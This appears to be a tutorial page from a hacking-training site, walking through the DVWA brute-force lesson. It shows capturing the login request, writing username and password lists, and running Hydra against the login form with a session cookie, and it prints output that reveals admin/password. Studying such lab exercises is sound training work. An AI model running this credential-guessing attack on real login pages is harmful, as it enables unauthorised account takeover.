<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <meta name="description" content="Damn Vulnerable Web App - Brute Force">

        <meta property="og:site_name" content="Hacker Lab Learn"/>
        <meta property="og:title" content="Brute Force | Hacker Lab Learn"/>
        <meta property="og:description" content="Damn Vulnerable Web App - Brute Force"/>
        <meta property="og:url" content="https://my-jigsaw-docs.com/walkthroughs/damn-vulnerable-web-app/brute-force"/>
        <meta property="og:image" content="/assets/img/logo.png"/>
        <meta property="og:type" content="website"/>

        <meta name="twitter:image:alt" content="Hacker Lab Learn">
        <meta name="twitter:card" content="summary_large_image">

        
        <title>Hacker Lab Learn | Brute Force</title>

        <link rel="home" href="https://my-jigsaw-docs.com">
        <link rel="icon" href="/favicon.ico">

        
                    <!-- Insert analytics code here -->
        
        <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,300i,400,400i,700,700i,800,800i" rel="stylesheet">
        <link rel="stylesheet" href="/assets/build/css/main.css?id=829c17c8b6b463371e17">

            </head>

    <body class="flex flex-col justify-between min-h-screen bg-grey-lightest text-grey-darkest leading-normal font-sans">
        <header class="flex items-center shadow bg-white border-b h-24 mb-8 py-4" role="banner">
            <div class="container flex items-center max-w-4xl mx-auto px-4 lg:px-8">
                <div class="flex items-center">
                    <a href="/" title="Hacker Lab Learn home" class="inline-flex items-center">
                        <img class="h-8 md:h-10 mr-3" src="/assets/img/logo.svg" alt="Hacker Lab Learn logo" />

                        <h1 class="text-lg md:text-2xl text-blue-darkest font-semibold hover:text-blue-dark my-0 pr-4">Hacker Lab Learn</h1>
                    </a>
                </div>

                <div class="flex flex-1 justify-end items-center text-right md:pl-10">
                                    </div>
            </div>

                <button class="flex justify-center items-center bg-blue border border-blue h-10 mr-4 px-5 rounded-full lg:hidden focus:outline-none"
    onclick="navMenu.toggle()"
>
    <svg id="js-nav-menu-show" xmlns="http://www.w3.org/2000/svg"
        class="fill-current text-white h-9 w-4" viewBox="0 0 32 32"
    >
        <path d="M4,10h24c1.104,0,2-0.896,2-2s-0.896-2-2-2H4C2.896,6,2,6.896,2,8S2.896,10,4,10z M28,14H4c-1.104,0-2,0.896-2,2  s0.896,2,2,2h24c1.104,0,2-0.896,2-2S29.104,14,28,14z M28,22H4c-1.104,0-2,0.896-2,2s0.896,2,2,2h24c1.104,0,2-0.896,2-2  S29.104,22,28,22z"/>
    </svg>

    <svg id="js-nav-menu-hide" xmlns="http://www.w3.org/2000/svg"
        class="hidden fill-current text-white h-9 w-4" viewBox="0 0 36 30"
    >
        <polygon points="32.8,4.4 28.6,0.2 18,10.8 7.4,0.2 3.2,4.4 13.8,15 3.2,25.6 7.4,29.8 18,19.2 28.6,29.8 32.8,25.6 22.2,15 "/>
    </svg>
</button>

        </header>

        <main role="main" class="w-full flex-auto">
            <section class="container max-w-4xl mx-auto px-6 md:px-8 py-4">
    <div class="flex flex-col lg:flex-row">
        <nav id="js-nav-menu" class="nav-menu hidden lg:block">
            <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/getting-started"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Getting Started
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">WebGoat 8 Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/general"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            General
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-introduction"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Introduction)
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-advanced"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Advanced)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Damn Vulnerable Web App (DVWA) Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/brute-force"
            class="lvl1  active font-semibold text-blue nav-menu__item hover:text-blue"
        >
            Brute Force
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/command-injection"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Command Injection
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/cross-site-request-forgery"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Cross Site Request Forgery (CSRF)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Ubuntu Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Ace of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/8-of-clubs"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            8 of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/5-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            5 of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Windows Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/king-of-diamonds"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            King of Diamonds
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/ace-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Ace of Hearts
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/jack-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Jack of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Essentials</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/essentials/scp"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            scp
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh-keygen"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh-keygen
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/browser-developer-tools"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Browser Developer Tools
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <a href="/contribute"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Contribute
        </a>
    
    </li>
    </ul>
        </nav>

        <div class="w-full lg:w-3/5 break-words pb-16 lg:pl-4" v-pre>
            <h1>Brute Force</h1>
<p>1. Navigate to the brute force lesson.
Let's start by opening up the <strong>Browser Developer Tools</strong> with the keyboard shortcut <code>CTRL + SHIFT + I</code>.
Then open the <strong>Network</strong> tab so we can view the network request made when we submit the form.</p>
<blockquote>
<p>Hint: The developer console is part of a set of developer tools built right into most popular web browsers.
We can use it to inspect what data the web page is sending back to the browser.
You can learn more about what the developer tools can be used for <a href="/essentials/browser-developer-tools">here</a>.</p>
</blockquote>
<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/brute-force/2-network-tab.PNG">
<p>2. Now let's fill out the form with a random guess and submit the form.
The purpose of this test submission is so we can inspect what the form sends back to the server using the <strong>Firefox Developer Tools</strong>.</p>
<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/brute-force/3-failed-login.PNG">
<p>4. Take a look at the request the browser sent to the server by opening the <strong>Network</strong> tab and then clicking on <strong>Params</strong> sub tab.
You can see that the request sends the entered user/password combo to the server under <code>username</code> and <code>password</code> fields in the <strong>Query string</strong>.</p>
<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/brute-force/4-params.PNG">
<p>5. Let's switch over to your kali instance, reference the <a href="/walkthroughs/damn-vulnerable-web-app/quickstart">quickstart guide</a> if you need a refresher on how to do this.
Once logged into you Kali instance, use a text editor like <a href="/tools/vim">vim</a> to create a list of users, and a list of passwords to try.
Here is an example list of users and passwords to try:</p>
<pre><code class="language-bash">root@49894cea06f8:~# cat users-list.txt
user
admin
administrator
root
dvwa
guest</code></pre>
<pre><code class="language-bash">root@49894cea06f8:~# cat passwords-list.txt
password
password1
p@ssword
123456
password!
admin
dvwa</code></pre>
<blockquote>
<p>Hint: There are a variety of password dictionaries with popular passwords collections available for download (for example, checkout <a href="https://wiki.skullsecurity.org/Passwords">Skull Security</a>). The full version of Kali Linux has an entire directory of password lists in the <code>/usr/share/wordlists/</code> directory. This directory has been excluded from Hacker Lab because of it's size.</p>
</blockquote>
<p>6. take note of the files you just created:</p>
<pre><code class="language-bash">root@49894cea06f8:~# ls
passwords-list.txt  users-list.txt</code></pre>
<p>7. We're going to use a tool called <strong>Hydra</strong> to use those lists to brute force the login page.</p>
<ul>
<li><strong>-vV</strong> - show verbose output</li>
<li><strong>-L</strong> - text file with list of usernames to try</li>
<li><strong>-P</strong> - text file with list of passwords to try</li>
<li><strong>165.227.13.98</strong> - the host you're trying to brute force. Replace this value with the IP address of your DVWA instance.</li>
<li><strong>http-get-form</strong> - the type of brute force you're attempting</li>
<li><strong>&quot;/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:H=Cookie: security=low; PHPSESSID=8dqtkqabovs2i5eerqt1rkhfj2:incorrect&quot;</strong> - required parameters for http-get-form type brute force attack.
<ul>
<li>/vulnerabilities/brute/ - url for the login page to brute force</li>
<li>username=^USER^&amp;password=^PASS^ - username and password fields to use</li>
<li>incorrect - a string found on the page for a failed login so hydra can tell if it succeeded or not</li>
<li>H=Cookie: security=low; PHPSESSID=8dqtkqabovs2i5eerqt1rkhfj2 - cookies to send along with the request</li>
</ul></li>
<li><strong>-t 1</strong> - number of threads to use</li>
<li><strong>-w 5</strong> - wait time for response in seconds</li>
<li><strong>-W 5</strong> - wait time between requests in seconds</li>
<li><strong>-f</strong> - stop trying after the first successful login attempt</li>
</ul>
<blockquote>
<p>Tip: Use the command <code>hydra -h</code>, or checkout the <a href="https://github.com/vanhauser-thc/thc-hydra">official documentation</a> to learn more about how the above parameters work. </p>
</blockquote>
<p>Here is the full command to run</p>
<p><strong>Important Note:</strong></p>
<ul>
<li>Replace <code>138.68.19.178</code> with the IP address of your DVWA instance.</li>
<li>Replace <code>ufv95uanphuove4tetd8gml5c3</code> with the <code>PHPSESS</code> cookie value found under the <strong>Cookies</strong> Sub tab of the <strong>Network</strong> Panel.</li>
</ul>
<pre><code class="language-bash">hacker-lab@49894cea06f8:~# hydra 138.68.19.178 -vV -L ./users-list.txt -P ./passwords-list.txt http-get-form "/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:incorrect:H=Cookie: security=low; PHPSESSID=ufv95uanphuove4tetd8gml5c3" -t 1 -w 2 -W 2 -f</code></pre>
<p>And here are the results:</p>
<pre><code class="language-bash">Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

[WARNING] the waittime you set is low, this can result in errornous results
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-07-19 21:42:16
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 49 login tries (l:7/p:7), ~49 tries per task
[DATA] attacking http-get-form://134.209.51.169:80/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:incorrect:H=Cookie: security=low; PHPSESSID=ufv95uanphuove4tetd8gml5c3
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 134.209.51.169 - login "user" - pass "password" - 1 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "password1" - 2 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "p@ssword" - 3 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "123456" - 4 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "password!" - 5 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "admin" - 6 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "dvwa" - 7 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "admin" - pass "password" - 8 of 49 [child 0] (0/0)
[80][http-get-form] host: 134.209.51.169   login: admin   password: password
[STATUS] attack finished for 134.209.51.169 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-07-19 21:43:06
</code></pre>
<p>8. hydra just tried all possible combinations of usernames and passwords until it found one that worked.
Try typing in the user credentials:</p>
<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/brute-force/5-success.PNG">        </div>
    </div>
</section>
        </main>

        <script src="/assets/build/js/main.js?id=ba3916078c37342007f3"></script>

        <script>
    const navMenu = {
        toggle() {
            const menu = document.getElementById('js-nav-menu');
            menu.classList.toggle('hidden');
            menu.classList.toggle('lg:block');
            document.getElementById('js-nav-menu-hide').classList.toggle('hidden');
            document.getElementById('js-nav-menu-show').classList.toggle('hidden');
        },
    }
</script>

        <footer class="bg-white text-center text-sm mt-12 py-4" role="contentinfo">
            <ul class="flex flex-col md:flex-row justify-center list-reset">
                <li class="md:mr-2">
                    &copy; <a href="https://thehackerlab.co" title="The Hacker Lab website">The Hacker Lab, LLC</a> 2019.
                </li>

                <li>
                    Built with <a href="http://jigsaw.tighten.co" title="Jigsaw by Tighten">Jigsaw</a>
                    and <a href="https://tailwindcss.com" title="Tailwind CSS, a utility-first CSS framework">Tailwind CSS</a>.
                </li>
            </ul>
        </footer>
    </body>
</html>
